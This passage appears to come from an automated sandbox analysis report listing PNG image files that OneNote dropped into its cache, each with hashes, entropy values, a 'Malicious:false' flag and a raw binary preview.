                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
